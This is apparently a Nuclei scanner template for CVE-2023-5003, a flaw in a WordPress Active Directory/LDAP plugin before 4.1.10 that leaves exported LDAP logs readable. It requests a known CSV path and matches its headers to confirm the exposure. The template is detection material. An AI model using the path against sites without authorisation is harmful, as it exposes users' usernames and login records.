id: CVE-2023-5003

info:
  name: Active Directory Integration WP Plugin < 4.1.10 - Log Disclosure
  author: Kazgangap
  severity: high
  description: |
    The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so.
  remediation: Fixed in 4.1.10
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5003
    - https://wpscan.com/vulnerability/91f4e500-71f3-4ef6-9cc7-24a7c12a5748/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-5003
    epss-score: 0.00084
    epss-percentile: 0.35074
    cpe: cpe:2.3:a:miniorange:active_directory_integration_\/_ldap_integration:*:*:*:*:*:wordpress:*:*
  metadata:
    vendor: miniorange
    product: active_directory_integration_\/_ldap_integration
    framework: wordpress
    verified: true
    max-request: 1
  tags: wpscan,exposure,csv,ldap,cve2023,wordpress,wp-plugin

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/ldap-authentication-report.csv"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "ID"
          - "USERNAME"
          - "TIME"
          - "LDAP STATUS"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bd156a20bbfa2b8fcbab364a68192646c450da886c638558ab7c88166483aa44022100d58dac4f441a368fc420c322d67aef9bfeecadc03665b62bf18dc363f7421566:922c64590222798bb761d5b6d8e72950